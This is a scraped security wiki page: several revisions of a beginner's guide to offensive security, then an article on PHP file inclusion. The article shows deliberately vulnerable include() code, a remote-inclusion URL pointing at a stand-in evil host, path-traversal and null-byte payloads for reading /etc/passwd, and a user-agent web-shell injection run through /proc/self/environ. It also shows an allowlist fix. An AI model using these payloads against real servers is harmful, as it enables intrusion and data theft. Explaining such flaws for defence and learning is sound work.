[[Web exploitation]] can be used to [[Command Injection|execute remote commands]], [[steal cookies]], [[SQL injection|extract database information]], bypass [[authentication credentials|authentication]], and more. Simply because [[exploitation]] of [[interpreted languages]] is easier than [[exploitation]] of [[compiled languages]] does not make it any less effective. This, in conjunction with the recent popularity of [[web application]]s, makes it the best place to begin. We've also developed a series of [[web exploitation tools]] to assist beginners in remedial tasks.<br />
<br />
=== Binary exploitation ===<br />
Exploitation of [[compiled languages]] used to be much easier than it is today. Due to [[countermeasures]] like [[DEP]], [[ASLR]], and [[IPS]] applications/devices, [[binary]] [[exploitation]] is becoming more and more difficult. To perform a [[filter bypass]] on a modern [[Operating System]], the [[shellcode]] or [[machine code]] used during a [[buffer overflow]] exploit must be crafted to bypass all of the restrictions in place. Beginners usually start learning to write [[shellcode]] with a fundamental knowledge of [[assembly]]. Once an understanding of [[assembly]] for the respective [[operating system]] is obtained, [[null-free shellcode]] is usually the first type of shellcode written by a beginner. It is even possible to write printable and polymorphic [[alphanumeric shellcode]] and [[ascii shellcode]] for [[IDS evasion]].<br />
<br />
=== Network exploitation ===<br />
Network exploitation requires a solid understanding of network administration and network [[protocols]].<br />
<br />
== Maintaining access ==</div>DPYJulietowbaijchttps://nets.ec/index.php?title=User:Hatter/getting_started&diff=7742User:Hatter/getting started2012-07-01T11:46:32Z<p>DPYJulietowbaijc: /* Administration */</p>
<hr />
<div>So you're new to offensive security, and one day you want to call yourself a hacker. Understanding the building blocks of a system is the first step towards learning to control it. A solid basis in [[administration]] is needed in order to know how to use a machine. A solid basis in [[programming]] will help you understand what [[information gathering]] leads to successful [[exploitation]] and [[maintaining access]]. While [[countermeasures]] do get in the way, most can be [[IDS evasion|evaded]] or [[filter bypass|bypassed]] with an intermediate knowledge of [[programming]].<br />
<br />
<br />
== Administration ==<br />
Administration can be broken into a few categories, but for the purposes of this library, administration is divided into system administration and network administration. <br />
<br />
Mastery of an [[Operating System]] is essential. Most [[server]]s on the internet are powered by [[Linux]]. While difficult, a head-first approach to learning [[Linux]] can be obtained with [[Gentoo Installation]]. We crawl before we learn to walk. Mastery of the basics of file manipulation, diagnostic tools and the like in the Linux environment will make you much more efficient when using Linux to do anything - be it rooting a box or web exploitation - so it is advised that you check out the [[Bash book]], which will familiarise you with the commands that are essential to using a Linux system efficiently.<br />
<br />
Protecting yourself on the internet is essential, although you have already taken the first step by using a Linux box - especially if you chose to use Gentoo. In order to protect yourself from malicious packets, see the article on [[Iptables]] for filtering incoming packets and dropping those that are potentially malicious in nature. It is also a good idea to check the [[Anonymity]] article for tips on how to keep your identity secret on the internet - depending on just what you intend to do, these measures can be as simple or as complex as you desire.<br />
<br />
== Code == <br />
[[Programming]] is the next essential skill. Without knowing a [[programming language]] it is nearly impossible to abuse any [[application]]. [[Assembly]] and [[machine code]] are the building blocks of all other programming languages. These are the predecessors to the [[C]] language, a mid-level [[compiled language]] which became the cornerstone for nearly all of the modern [[interpreted languages]], including [[PHP]], [[Perl]], [[Python]], and [[Ruby]]. The [[Linux]] operating system is written in [[C]] and [[C++]].<br />
<br />
== Exploitation == <br />
Most beginners find [[web exploitation]] to be the easiest topic to start with. This requires a strong understanding of the [[HTTP|world wide web]]. [[Web application]]s are [[programming|programmed]] using a series of [[interpreted languages]]. This nearly always involves some form of [[HTML]] and [[CSS]], originally developed as a document format and that document's stylesheet. Dynamic content is usually powered by a [[database]], and usually involves [[SQL]] code. The [[programming language]]s used to render dynamic content are [[interpreted languages|interpreted]] on the web [[server]], while languages such as [[HTML]], [[CSS]], and [[JavaScript]] are interpreted and rendered by the client. <br />
<br />
=== Web exploitation ===<br />
[[Web exploitation]] can be used to [[Command Injection|execute remote commands]], [[steal cookies]], [[SQL injection|extract database information]], bypass [[authentication credentials|authentication]], and more. Simply because [[exploitation]] of [[interpreted languages]] is easier than [[exploitation]] of [[compiled languages]] does not make it any less effective. This, in conjunction with the recent popularity of [[web application]]s, makes it the best place to begin. We've also developed a series of [[web exploitation tools]] to assist beginners in remedial tasks.<br />
<br />
=== Binary exploitation ===<br />
Exploitation of [[compiled languages]] used to be much easier than it is today. Due to [[countermeasures]] like [[DEP]], [[ASLR]], and [[IPS]] applications/devices, [[binary]] [[exploitation]] is becoming more and more difficult. To perform a [[filter bypass]] on a modern [[Operating System]], the [[shellcode]] or [[machine code]] used during a [[buffer overflow]] exploit must be crafted to bypass all of the restrictions in place. Beginners usually start learning to write [[shellcode]] with a fundamental knowledge of [[assembly]]. Once an understanding of [[assembly]] for the respective [[operating system]] is obtained, [[null-free shellcode]] is usually the first type of shellcode written by a beginner. It is even possible to write printable and polymorphic [[alphanumeric shellcode]] and [[ascii shellcode]] for [[IDS evasion]].<br />
<br />
=== Network exploitation ===<br />
Network exploitation requires a solid understanding of network administration and network [[protocols]].<br />
<br />
== Maintaining access ==</div>DPYJulietowbaijchttps://nets.ec/index.php?title=User:Hatter/getting_started&diff=7741User:Hatter/getting started2012-07-01T11:44:14Z<p>DPYJulietowbaijc: /* Administration */</p>
<hr />
<div>So you're new to offensive security, and one day you want to call yourself a hacker. Understanding the building blocks of a system is the first step towards learning to control it. A solid basis in [[administration]] is needed in order to know how to use a machine. A solid basis in [[programming]] will help you understand what [[information gathering]] leads to successful [[exploitation]] and [[maintaining access]]. While [[countermeasures]] do get in the way, most can be [[IDS evasion|evaded]] or [[filter bypass|bypassed]] with an intermediate knowledge of [[programming]].<br />
<br />
<br />
== Administration ==<br />
Administration can be broken into a few categories, but for the purposes of this library, administration is divided into system administration and network administration. <br />
<br />
Mastery of an [[Operating System]] is essential. Most [[server]]s on the internet are powered by [[Linux]]. While difficult, a head-first approach to learning [[Linux]] can be obtained with [[Gentoo Installation]]. We crawl before we learn to walk. Mastery of the basics of file manipulation, diagnostic tools and the like in the Linux environment will make you much more efficient when using Linux to do anything - be it rooting a box or web exploitation - so it is advised that you check out the [[Bash book]], which will familiarise you with the commands that are essential to using a Linux system efficiently.<br />
<br />
Protecting yourself on the internet is essential, although you have already taken the first step by using a Linux box - especially if you chose to use Gentoo. In order to protect yourself from malicious packets, see the article on [[Iptables]] for filtering incoming packets and dropping those that are potentially malicious in nature.<br />
<br />
== Code == <br />
[[Programming]] is the next essential skill. Without knowing a [[programming language]] it is nearly impossible to abuse any [[application]]. [[Assembly]] and [[machine code]] are the building blocks of all other programming languages. These are the predecessors to the [[C]] language, a mid-level [[compiled language]] which became the cornerstone for nearly all of the modern [[interpreted languages]], including [[PHP]], [[Perl]], [[Python]], and [[Ruby]]. The [[Linux]] operating system is written in [[C]] and [[C++]].<br />
<br />
== Exploitation == <br />
Most beginners find [[web exploitation]] to be the easiest topic to start with. This requires a strong understanding of the [[HTTP|world wide web]]. [[Web application]]s are [[programming|programmed]] using a series of [[interpreted languages]]. This nearly always involves some form of [[HTML]] and [[CSS]], originally developed as a document format and that document's stylesheet. Dynamic content is usually powered by a [[database]], and usually involves [[SQL]] code. The [[programming language]]s used to render dynamic content are [[interpreted languages|interpreted]] on the web [[server]], while languages such as [[HTML]], [[CSS]], and [[JavaScript]] are interpreted and rendered by the client. <br />
<br />
=== Web exploitation ===<br />
[[Web exploitation]] can be used to [[Command Injection|execute remote commands]], [[steal cookies]], [[SQL injection|extract database information]], bypass [[authentication credentials|authentication]], and more. Simply because [[exploitation]] of [[interpreted languages]] is easier than [[exploitation]] of [[compiled languages]] does not make it any less effective. This, in conjunction with the recent popularity of [[web application]]s, makes it the best place to begin. We've also developed a series of [[web exploitation tools]] to assist beginners in remedial tasks.<br />
<br />
=== Binary exploitation ===<br />
Exploitation of [[compiled languages]] used to be much easier than it is today. Due to [[countermeasures]] like [[DEP]], [[ASLR]], and [[IPS]] applications/devices, [[binary]] [[exploitation]] is becoming more and more difficult. To perform a [[filter bypass]] on a modern [[Operating System]], the [[shellcode]] or [[machine code]] used during a [[buffer overflow]] exploit must be crafted to bypass all of the restrictions in place. Beginners usually start learning to write [[shellcode]] with a fundamental knowledge of [[assembly]]. Once an understanding of [[assembly]] for the respective [[operating system]] is obtained, [[null-free shellcode]] is usually the first type of shellcode written by a beginner. It is even possible to write printable and polymorphic [[alphanumeric shellcode]] and [[ascii shellcode]] for [[IDS evasion]].<br />
<br />
=== Network exploitation ===<br />
Network exploitation requires a solid understanding of network administration and network [[protocols]].<br />
<br />
== Maintaining access ==</div>DPYJulietowbaijchttps://nets.ec/index.php?title=User:Hatter/getting_started&diff=7740User:Hatter/getting started2012-07-01T11:06:00Z<p>DPYJulietowbaijc: /* Administration */</p>
<hr />
<div>So you're new to offensive security, and one day you want to call yourself a hacker. Understanding the building blocks of a system is the first step towards learning to control it. A solid basis in [[administration]] is needed in order to know how to use a machine. A solid basis in [[programming]] will help you understand what [[information gathering]] leads to successful [[exploitation]] and [[maintaining access]]. While [[countermeasures]] do get in the way, most can be [[IDS evasion|evaded]] or [[filter bypass|bypassed]] with an intermediate knowledge of [[programming]].<br />
<br />
<br />
== Administration ==<br />
Administration can be broken into a few categories, but for the purposes of this library, administration is divided into system administration and network administration. <br />
<br />
Mastery of an [[Operating System]] is essential. Most [[server]]s on the internet are powered by [[Linux]]. While difficult, a head-first approach to learning [[Linux]] can be obtained with [[Gentoo Installation]]. We crawl before we learn to walk. Mastery of the basics of file manipulation, diagnostic tools and the like in the Linux environment will make you much more efficient when using Linux to do anything - be it rooting a box or web exploitation - so it is advised that you check out the [[Bash book]], which will familiarise you with the commands that are essential to using a Linux system efficiently.<br />
<br />
Protecting yourself on the internet is essential, although you have already taken the first step by using a Linux (preferably Gentoo) box. In order to protect yourself from malicious packets, see the article on [[Iptables]] for filtering incoming packets and dropping those that are potentially malicious in nature.<br />
<br />
== Code == <br />
[[Programming]] is the next essential skill. Without knowing a [[programming language]] it is nearly impossible to abuse any [[application]]. [[Assembly]] and [[machine code]] are the building blocks of all other programming languages. These are the predecessors to the [[C]] language, a mid-level [[compiled language]] which became the cornerstone for nearly all of the modern [[interpreted languages]], including [[PHP]], [[Perl]], [[Python]], and [[Ruby]]. The [[Linux]] operating system is written in [[C]] and [[C++]].<br />
<br />
== Exploitation == <br />
Most beginners find [[web exploitation]] to be the easiest topic to start with. This requires a strong understanding of the [[HTTP|world wide web]]. [[Web application]]s are [[programming|programmed]] using a series of [[interpreted languages]]. This nearly always involves some form of [[HTML]] and [[CSS]], originally developed as a document format and that document's stylesheet. Dynamic content is usually powered by a [[database]], and usually involves [[SQL]] code. The [[programming language]]s used to render dynamic content are [[interpreted languages|interpreted]] on the web [[server]], while languages such as [[HTML]], [[CSS]], and [[JavaScript]] are interpreted and rendered by the client. <br />
<br />
=== Web exploitation ===<br />
[[Web exploitation]] can be used to [[Command Injection|execute remote commands]], [[steal cookies]], [[SQL injection|extract database information]], bypass [[authentication credentials|authentication]], and more. Simply because [[exploitation]] of [[interpreted languages]] is easier than [[exploitation]] of [[compiled languages]] does not make it any less effective. This, in conjunction with the recent popularity of [[web application]]s, makes it the best place to begin. We've also developed a series of [[web exploitation tools]] to assist beginners in remedial tasks.<br />
<br />
=== Binary exploitation ===<br />
Exploitation of [[compiled languages]] used to be much easier than it is today. Due to [[countermeasures]] like [[DEP]], [[ASLR]], and [[IPS]] applications/devices, [[binary]] [[exploitation]] is becoming more and more difficult. To perform a [[filter bypass]] on a modern [[Operating System]], the [[shellcode]] or [[machine code]] used during a [[buffer overflow]] exploit must be crafted to bypass all of the restrictions in place. Beginners usually start learning to write [[shellcode]] with a fundamental knowledge of [[assembly]]. Once an understanding of [[assembly]] for the respective [[operating system]] is obtained, [[null-free shellcode]] is usually the first type of shellcode written by a beginner. It is even possible to write printable and polymorphic [[alphanumeric shellcode]] and [[ascii shellcode]] for [[IDS evasion]].<br />
<br />
=== Network exploitation ===<br />
Network exploitation requires a solid understanding of network administration and network [[protocols]].<br />
<br />
== Maintaining access ==</div>DPYJulietowbaijchttps://nets.ec/index.php?title=User:Hatter/getting_started&diff=7739User:Hatter/getting started2012-07-01T10:37:06Z<p>DPYJulietowbaijc: /* Administration */</p>
<hr />
<div>So you're new to offensive security, and one day you want to call yourself a hacker. Understanding the building blocks of a system is the first step towards learning to control it. A solid basis in [[administration]] is needed in order to know how to use a machine. A solid basis in [[programming]] will help you understand what [[information gathering]] leads to successful [[exploitation]] and [[maintaining access]]. While [[countermeasures]] do get in the way, most can be [[IDS evasion|evaded]] or [[filter bypass|bypassed]] with an intermediate knowledge of [[programming]].<br />
<br />
<br />
== Administration ==<br />
Administration can be broken into a few categories, but for the purposes of this library, administration is divided into system administration and network administration. <br />
<br />
Mastery of an [[Operating System]] is essential. Most [[server]]s on the internet are powered by [[Linux]]. While difficult, a head-first approach to learning [[Linux]] can be obtained with [[Gentoo Installation]]. We crawl before we learn to walk. Mastery of the basics of file manipulation, diagnostic tools and the like in the Linux environment will make you much more efficient when using Linux to do anything - be it rooting a box or web exploitation - so it is advised that you check out the [[Bash book]], which will familiarise you with the commands that are essential to using a Linux system efficiently.<br />
<br />
== Code == <br />
[[Programming]] is the next essential skill. Without knowing a [[programming language]] it is nearly impossible to abuse any [[application]]. [[Assembly]] and [[machine code]] are the building blocks of all other programming languages. These are the predecessors to the [[C]] language, a mid-level [[compiled language]] which became the cornerstone for nearly all of the modern [[interpreted languages]], including [[PHP]], [[Perl]], [[Python]], and [[Ruby]]. The [[Linux]] operating system is written in [[C]] and [[C++]].<br />
<br />
== Exploitation == <br />
Most beginners find [[web exploitation]] to be the easiest topic to start with. This requires a strong understanding of the [[HTTP|world wide web]]. [[Web application]]s are [[programming|programmed]] using a series of [[interpreted languages]]. This nearly always involves some form of [[HTML]] and [[CSS]], originally developed as a document format and that document's stylesheet. Dynamic content is usually powered by a [[database]], and usually involves [[SQL]] code. The [[programming language]]s used to render dynamic content are [[interpreted languages|interpreted]] on the web [[server]], while languages such as [[HTML]], [[CSS]], and [[JavaScript]] are interpreted and rendered by the client. <br />
<br />
=== Web exploitation ===<br />
[[Web exploitation]] can be used to [[Command Injection|execute remote commands]], [[steal cookies]], [[SQL injection|extract database information]], bypass [[authentication credentials|authentication]], and more. Simply because [[exploitation]] of [[interpreted languages]] is easier than [[exploitation]] of [[compiled languages]] does not make it any less effective. This, in conjunction with the recent popularity of [[web application]]s, makes it the best place to begin. We've also developed a series of [[web exploitation tools]] to assist beginners in remedial tasks.<br />
<br />
=== Binary exploitation ===<br />
Exploitation of [[compiled languages]] used to be much easier than it is today. Due to [[countermeasures]] like [[DEP]], [[ASLR]], and [[IPS]] applications/devices, [[binary]] [[exploitation]] is becoming more and more difficult. To perform a [[filter bypass]] on a modern [[Operating System]], the [[shellcode]] or [[machine code]] used during a [[buffer overflow]] exploit must be crafted to bypass all of the restrictions in place. Beginners usually start learning to write [[shellcode]] with a fundamental knowledge of [[assembly]]. Once an understanding of [[assembly]] for the respective [[operating system]] is obtained, [[null-free shellcode]] is usually the first type of shellcode written by a beginner. It is even possible to write printable and polymorphic [[alphanumeric shellcode]] and [[ascii shellcode]] for [[IDS evasion]].<br />
<br />
=== Network exploitation ===<br />
Network exploitation requires a solid understanding of network administration and network [[protocols]].<br />
<br />
== Maintaining access ==</div>DPYJulietowbaijchttps://nets.ec/index.php?title=User:Hatter/getting_started&diff=7738User:Hatter/getting started2012-07-01T10:36:30Z<p>DPYJulietowbaijc: /* Administration */</p>
<hr />
<div>So you're new to offensive security, and one day you want to call yourself a hacker. Understanding the building blocks of a system is the first step towards learning to control it. A solid basis in [[administration]] is needed in order to know how to use a machine. A solid basis in [[programming]] will help you understand what [[information gathering]] leads to successful [[exploitation]] and [[maintaining access]]. While [[countermeasures]] do get in the way, most can be [[IDS evasion|evaded]] or [[filter bypass|bypassed]] with an intermediate knowledge of [[programming]].<br />
<br />
<br />
== Administration ==<br />
Administration can be broken into a few categories, but for the purposes of this library, administration is divided into system administration and network administration. <br />
<br />
Mastery of an [[Operating System]] is essential. Most [[server]]s on the internet are powered by [[Linux]]. While difficult, a head-first approach to learning [[Linux]] can be obtained with [[Gentoo Installation]]. We crawl before we learn to walk. Mastery of the basics of file manipulation, diagnostic tools and the like in the Linux environment will make you much more efficient when using Linux to do anything - be it rooting a box or web exploitation - so it is advised that you check out the [[Bash book]], which will familiarise you with some of the essential commands under the Linux system.<br />
<br />
== Code == <br />
[[Programming]] is the next essential skill. Without knowing a [[programming language]] it is nearly impossible to abuse any [[application]]. [[Assembly]] and [[machine code]] are the building blocks of all other programming languages. These are the predecessors to the [[C]] language, a mid-level [[compiled language]] which became the cornerstone for nearly all of the modern [[interpreted languages]], including [[PHP]], [[Perl]], [[Python]], and [[Ruby]]. The [[Linux]] operating system is written in [[C]] and [[C++]].<br />
<br />
== Exploitation == <br />
Most beginners find [[web exploitation]] to be the easiest topic to start with. This requires a strong understanding of the [[HTTP|world wide web]]. [[Web application]]s are [[programming|programmed]] using a series of [[interpreted languages]]. This nearly always involves some form of [[HTML]] and [[CSS]], originally developed as a document format and that document's stylesheet. Dynamic content is usually powered by a [[database]], and usually involves [[SQL]] code. The [[programming language]]s used to render dynamic content are [[interpreted languages|interpreted]] on the web [[server]], while languages such as [[HTML]], [[CSS]], and [[JavaScript]] are interpreted and rendered by the client. <br />
<br />
=== Web exploitation ===<br />
[[Web exploitation]] can be used to [[Command Injection|execute remote commands]], [[steal cookies]], [[SQL injection|extract database information]], bypass [[authentication credentials|authentication]], and more. Simply because [[exploitation]] of [[interpreted languages]] is easier than [[exploitation]] of [[compiled languages]] does not make it any less effective. This, in conjunction with the recent popularity of [[web application]]s makes it the best place to begin. We've also developed a series of [[web exploitation tools]] to assist beginners in remedial tasks.<br />
<br />
=== Binary exploitation ===<br />
Exploitation of [[compiled languages]] used to be much easier than it is today. Due to [[countermeasures]] like [[DEP]], [[ASLR]], and [[IPS]] applications/devices, [[binary]] [[exploitation]] is becoming more and more difficult. To perform a [[filter bypass]] on a modern [[Operating System]], the [[shellcode]] or [[machine code]] used during a [[buffer overflow]] exploit must be crafted to bypass all of the restrictions in place. Beginners usually start learning to write [[shellcode]] with a fundamental knowledge of [[assembly]]. Once an understanding of [[assembly]] for the respective [[operating system]] is obtained, [[null-free shellcode]] is usually the first type of shellcode written by a beginner. It is even possible to write printable and polymorphic [[alphanumeric shellcode]] and [[ascii shellcode]] for [[IDS evasion]].<br />
<br />
=== Network exploitation ===<br />
Network exploitation requires a solid understanding of network administration and network [[protocols]].<br />
<br />
== Maintaining access ==</div>DPYJulietowbaijchttps://nets.ec/index.php?title=User:Hatter/getting_started&diff=7737User:Hatter/getting started2012-07-01T10:35:36Z<p>DPYJulietowbaijc: /* Administration */</p>
<hr />
<div>So you're new to offensive security, and one day you want to call yourself a hacker. Understanding the building blocks of a system is the first step towards learning to control it. A solid basis in [[administration]] is needed in order to know how to use a machine. A solid basis in [[programming]] will help you understand what [[information gathering]] leads to successful [[exploitation]] and [[maintaining access]]. While [[countermeasures]] do get in the way, most can be [[IDS evasion|evaded]] or [[filter bypass|bypassed]] with an intermediate knowledge of [[programming]].<br />
<br />
<br />
== Administration ==<br />
Administration can be broken into a few categories, but for the purposes of this library, administration is divided into system administration, and network administration. <br />
<br />
Mastery of an [[Operating System]] is essential. Most [[server]]s on the internet are powered by [[Linux]]. While difficult, a head-first approach to learning [[Linux]] can be obtained with [[Gentoo Installation]]. We crawl before we learn to walk. Mastery of the basics of file manipulation, diagnostic tools and the like in the Linux environment will make you much more efficient when using Linux for anything, be it rooting a box or web exploitation, so it is advised that you check out the [[Bash Book]], which will familiarise you with some of the essential commands on a Linux system.<br />
<br />
== Code == <br />
[[Programming]] is the next essential skill. Without knowing a [[programming language]] it is nearly impossible to abuse any [[application]]. [[Assembly]] and [[machine code]] are the building blocks of all other programming languages. These are the predecessors to the [[C]] language, a mid-level [[compiled language]] which became the cornerstone for nearly all of the modern [[interpreted languages]], including [[PHP]], [[Perl]], [[Python]], and [[Ruby]]. The [[Linux]] operating system is written in [[C]] and [[C++]].<br />
<br />
== Exploitation == <br />
Most beginners find [[web exploitation]] to be the easiest topic to start with. This requires a strong understanding of the [[HTTP|world wide web]]. [[Web application]]s are [[programming|programmed]] using a series of [[interpreted languages]]. This nearly always involves some form of [[HTML]] and [[CSS]], originally developed to be a document and that document's stylesheet. Dynamic content is usually powered by a [[database]], and usually involves [[SQL]] code. The [[programming language]]s used to render dynamic content are [[interpreted languages|interpreted]] on the web [[server]], while languages such as [[HTML]], [[CSS]], and [[JavaScript]] are interpreted and rendered by the client. <br />
<br />
=== Web exploitation ===<br />
[[Web exploitation]] can be used to [[Command Injection|execute remote commands]], [[steal cookies]], [[SQL injection|extract database information]], bypass [[authentication credentials|authentication]], and more. Simply because [[exploitation]] of [[interpreted languages]] is easier than [[exploitation]] of [[compiled languages]] does not make it any less effective. This, in conjunction with the recent popularity of [[web application]]s makes it the best place to begin. We've also developed a series of [[web exploitation tools]] to assist beginners in remedial tasks.<br />
<br />
=== Binary exploitation ===<br />
Exploitation of [[compiled languages]] used to be much easier than it is today. Due to [[countermeasures]] like [[DEP]], [[ASLR]], and [[IPS]] applications/devices, [[binary]] [[exploitation]] is becoming more and more difficult. To perform a [[filter bypass]] on a modern [[Operating System]], the [[shellcode]] or [[machine code]] used during a [[buffer overflow]] exploit must be crafted to bypass all of the restrictions in place. Beginners usually start learning to write [[shellcode]] with a fundamental knowledge of [[assembly]]. Once an understanding of [[assembly]] for the respective [[operating system]] is obtained, [[null-free shellcode]] is usually the first type of shellcode written by a beginner. It is even possible to write printable and polymorphic [[alphanumeric shellcode]] and [[ascii shellcode]] for [[IDS evasion]].<br />
<br />
=== Network exploitation ===<br />
Network exploitation requires a solid understanding of network administration and network [[protocols]].<br />
<br />
== Maintaining access ==</div>DPYJulietowbaijchttps://nets.ec/index.php?title=File_Inclusion&diff=7665File Inclusion2012-06-28T21:31:54Z<p>DPYJulietowbaijc: /* Useful files for LFI */</p>
<hr />
<div>File inclusion refers to the process of manipulating unsanitised inputs that make use of PHP's include() function into including files that were not intended to be included. This can be used for the disclosure of privileged information (such as the contents of the /etc/shadow file) or including a file that contains some arbitrary code created by the attacker, and thus causing the server to run this code. <b>File inclusion</b> refers in a general sense to the inclusion of an unintended file, whereas <b>file disclosure</b> refers specifically to using file inclusion to obtain sensitive information.<br />
<br />
File inclusion is a vulnerability that exists because of [[PHP]]'s include() function accepting a variable as a parameter. <br />
<br />
__FORCETOC__<br />
<br />
==Introduction==<br />
:''This attack can be automated quickly using [[lfi_autopwn.pl]].''<br />
<br />
PHP's include() function does not merely include a library as similar functions do in [[C]] and other programming languages. It also executes any PHP code in the included file on the server side. As a result, if arbitrary code selected by the attacker can be included, it is possible to perform remote command execution.<br />
<br />
When a [[programmer]] allows a file to be selected for inclusion via any [[Web_Exploitation#Attack_Vectors|HTTP input]], this creates a '''File Inclusion''' [[vulnerability]]. By providing unexpected inputs that cause sensitive or attacker-controlled files to be included, information can be disclosed and execution can be hijacked.<br />
<br />
To [[patch]] this type of [[vulnerability]], one may employ whitelisting or simply stop allowing user input to specify files for inclusion. There are many prepackaged solutions and techniques to stop file inclusion vulnerabilities, although most of them can be bypassed with enough ingenuity. Where possible, it is better to avoid allowing user input to be directly translated into a file inclusion path. <br />
<br />
{{info|This could be classified as a [[Design Flaws|design flaw]] in [[PHP]] for allowing the inclusion of remote files to begin with, or for accepting a variable in its '''include()''' function.}}<br />
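The allowlisting approach recommended above, written out as an added example; this is not code from the original article or from any project it describes. The pages directory, the page names and the file layout are assumptions constructed for the example, and the request parameter '''file''' matches the vulnerable URLs shown on this page. The second resolver goes slightly beyond the text by showing a containment check for the case where the set of pages is not fixed in code:<br />

```php
<?php
// Added example (not from the article): taking a page name from the request
// without letting the request choose the file. PAGES_DIR and the page names
// below are assumptions constructed for this example.
declare(strict_types=1);

const PAGES_DIR = __DIR__ . '/pages';

// 1. Allowlist: the request selects a key, the code selects the file.
// '../', 'http://' and '%00' tricks never reach the filesystem because the
// user-supplied string is only ever used as an array key.
const PAGES = [
    'howto'   => PAGES_DIR . '/howto.php',
    'welcome' => PAGES_DIR . '/welcome.php',
];

function resolveAllowlisted(string $requested): ?string
{
    return PAGES[$requested] ?? null;
}

// 2. Containment check, for a pages directory that changes too often to keep
// an allowlist in code. The character restriction is the primary control; the
// realpath() prefix test is a safety net that also catches a symlink inside
// the pages directory pointing elsewhere (realpath() resolves symlinks and '..').
function resolveContained(string $requested, string $baseDir): ?string
{
    // Embedded NUL bytes truncate the path on old PHP builds (the '%00' trick).
    if (strpos($requested, "\0") !== false) {
        return null;
    }
    if (!preg_match('/^[A-Za-z0-9_-]{1,64}$/', $requested)) {
        return null;
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . '/' . $requested . '.php');
    if ($base === false || $path === false) {
        return null;
    }
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// Request handling: reject anything that is not a plain string, then include
// only what the resolver returned, never the raw parameter.
$requested = $_GET['file'] ?? '';
if (!is_string($requested)) {
    http_response_code(400);
    exit('Bad request');
}
// Swap in resolveContained($requested, PAGES_DIR) when the page set is not fixed.
$file = resolveAllowlisted($requested);
if ($file === null) {
    http_response_code(404);
    exit('Unknown page');
}
include $file;
```

With either resolver the '''allow_url_fopen''' and '''allow_url_include''' settings no longer decide the outcome of this include, because no attacker-controlled string is ever used as a path; keeping them disabled is still the right default for the rest of the application.<br />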
<br />
==Remote File Inclusion==<br />
<br />
Remote file inclusion refers to inclusion of a file that is not located on the victim's server. As recent versions of PHP have built-in safeguards that prevent remote inclusion unless it is explicitly enabled by the administrator, this form of vulnerability is now incredibly rare.<br />
<br />
An example URI for a vulnerable site would be '''/include.php?file=howto.php'''<br />
<br />
The [[PHP|PHP]] for this may look like:<br />
<br />
{{code<br />
|text=<br />
<source lang="html4strict"><br />
<HTML><br />
<TITLE>Page Title</TITLE><br />
<BODY><br />
</source><br />
<source lang="php"><br />
<?php<br />
include($_GET['file']);<br />
?><br />
</source><br />
<source lang="html4strict"><br />
</BODY></HTML><br />
</source><br />
}}<br />
<br />
{{warning|The above [[PHP]] code is [[vulnerability|vulnerable]]. Do not use this on your site!}}<br />
An attacker that sees<br />
<br />
/include.php?file=howto.php<br />
<br />
may change the URL to<br />
<br />
<nowiki>/include.php?file=http://evil.webserver/include.txt</nowiki><br />
<br />
<br><br />
In this example, if include.txt contains [[PHP]] code written by the attacker, that code will be executed on the server side.<br />
<br />
<br><br />
<br />
==Local File Inclusion==<br />
<br />
Local file inclusion can be just as dangerous, if not more so. It is far more widespread than RFI but can be more difficult to exploit, subject to whatever limitations and whitelisting are in place to prevent it. Local file inclusion occurs when the [[PHP|PHP]] code at '''/local.php?file=welcome''' looks similar to the following, but '''allow_url_fopen''' and '''allow_url_include''' have been disabled in the [[PHP]] configuration. This only allows the attacker to access local files:<br />
<br />
{{code<br />
|text=<br />
<source lang="php"><br />
<?php<br />
include($_GET['file']);<br />
?><br />
</source><br />
<br />
}}<br />
<br />
This is similar to the Remote File Inclusion [[vulnerability]]; however, reviewing the code it can be seen that [[PHP|PHP]] is reading a file from the local machine and then displaying it on the web page. The problem with this type of code is that, instead of handing execute, write and read permissions to an attacker, the [[programmer]] has still handed over read permissions.<br />
<br />
=== Local File Disclosure ===<br />
<br />
Using this knowledge, the attacker can then specify a file on the remote host that the [[PHP|PHP]] server has permission to read, and that file will be displayed in the web page. For example, the name of the file that contains the registry in Windows is ntusers.dat in the Windows directory. The attacker may request the URL:<br />
<br />
<br />
<nowiki>/local.php?file=../../../../../../../../../../../../../WINDOWS/ntusers.dat</nowiki><br />
<br />
Similarly, on a linux server:<br />
<br />
<nowiki>/local.php?file=../../../../../../../../../../../../../etc/passwd</nowiki><br />
<br />
Because local.php is vulnerable, it will display the registry of vuln.net or the /etc/passwd file in the attacker’s web browser. The first time the attacker sees a URL containing '''.php?file=''', the attacker will most likely attempt a remote file inclusion. If that fails, the attacker will then most likely attempt local file inclusion. Both of these techniques can be used for [[XSS|cross-site scripting]] attacks.<br />
<br />
{{info|A null [[byte|Byte]] can be used to truncate a path that a script builds by concatenation. For example, many scripts append '.php' to a user-supplied string before including it. Appending a null [[byte|Byte]] (%00) will often short-circuit this, allowing an attacker to include any file, regardless of extension.}}<br />
<br />
If the remote host is a UNIX or [[Linux]] based system, the attacker may be able to view /etc/passwd or /proc/cpuinfo with this technique:<br />
<br />
<nowiki>/local.php?file=../../../../../../../../../../../../../etc/passwd</nowiki><br />
<br />
Or using null-bytes:<br />
<br />
<nowiki>/local.php?file=../../../../../../../../../../../../../etc/passwd%00</nowiki><br />
<br />
Because the file is being included, this means that the attacker can see it if it is a text file, or execute any [[PHP|php]] inside of it.<br />
<br />
=== Code Injection ===<br />
<br />
Two common [[Input|input]] vectors for injecting [[PHP|PHP]] code are the "user-agent" and the httpd error log. The user-agent can be accessed through '''/proc/self/environ'''. Therefore, if an attacker uses tamper-data or a similar tool to cause their browser to send a custom user-agent containing the following string:<br />
<br />
{{code<br />
|text=<br />
<source lang="php"><br />
<?php<br />
system($_GET['cmd']);<br />
?><br />
</source><br />
}}<br />
<br />
<br />
and accesses the file:<br />
<br />
<nowiki>/local.php?file=../../../../../../../../../../../../../proc/self/environ?cmd=whoami</nowiki><br />
<br />
/proc/self/environ contains the user-agent of the attacker when included. As a result, when it is included the PHP code contained in the attacker's user-agent is executed, meaning that anything supplied to the page via the 'cmd' GET variable will be executed on the server with PHP's system() function, which executes commands at the OS level.<br />
<br />
The attacker can then retrieve the [[Linux]] or Unix username (the output of the whoami command) from the [[HTML]] returned by the [[PHP|PHP]] file.<br />
<br />
The other method is to use the error log: all requests that are denied or that lead to errors are stored in an error log. This means that if we send an illegal request containing some PHP code, the entire request (including the PHP code) will be written to the error log, which can later be included with LFI to execute our code.<br />
<br />
